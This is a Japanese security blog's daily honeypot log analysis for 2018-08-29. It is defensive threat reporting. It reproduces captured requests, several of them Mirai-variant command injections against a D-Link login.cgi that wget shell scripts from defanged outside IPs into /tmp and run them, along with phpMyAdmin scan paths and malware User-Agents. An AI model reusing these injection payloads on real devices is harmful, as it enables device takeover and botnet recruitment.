S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/08/29)

WOWhoneypotの2018/08/29(運用85日目)の簡易分析です。
本日の総アクセス件数は 54件です。以下が全アクセスログです。

31 2018-08-29 GET /
5 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
1 2018-08-29 GET /.well-known/security.txt
1 2018-08-29 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-29 GET /sitemap.xml
1 2018-08-29 GET /robots.txt
1 2018-08-29 GET /pma/scripts/setup.php
1 2018-08-29 GET /phpMyAdmin/scripts/setup.php
1 2018-08-29 GET /phpmyadmin/scripts/setup.php
1 2018-08-29 GET /MyAdmin/scripts/setup.php
1 2018-08-29 GET /myadmin/scripts/setup.php
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.33[.]171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-29 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-29 GET /favicon.ico 

 

phpMyAdmin関連(5件)と/を除外したアクセス数です。

5 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
2 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.33[.]171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$
1 2018-08-29 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-29 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-29 GET /.well-known/security.txt
1 2018-08-29 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-08-29 GET /sitemap.xml
1 2018-08-29 GET /robots.txt
1 2018-08-29 GET /favicon.ico

D-Linkの脆弱性を攻撃するMirai亜種のUsesr-Agentの内訳は以下です。

8 User-Agent: Hakai/2.0
2 User-Agent: Shinka/1.0
1 User-Agent: LMAO/2.0
1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

その他はZmEuによるphpMyAdminに対するスキャンとサイト構成の調査行為です。

 

本日のハンティングログは以下です。Mirai亜種のものです。

5 2018-08-29 wget hxxp://77.87.77[.]250/izuku.sh
2 2018-08-29 wget hxxp://209.141.33[.]86/d
1 2018-08-29 wget hxxp://80.211.112[.]150/k
1 2018-08-29 wget hxxp://176.32.33[.]171/bin
1 2018-08-29 wget hxxp://148.72.176[.]78/ngynx
1 2018-08-29 wget hxxp://148.72.176[.]78/ken.sh
1 2018-08-29 wget hxxp://128.199.251[.]119/t.php 

 

以上です。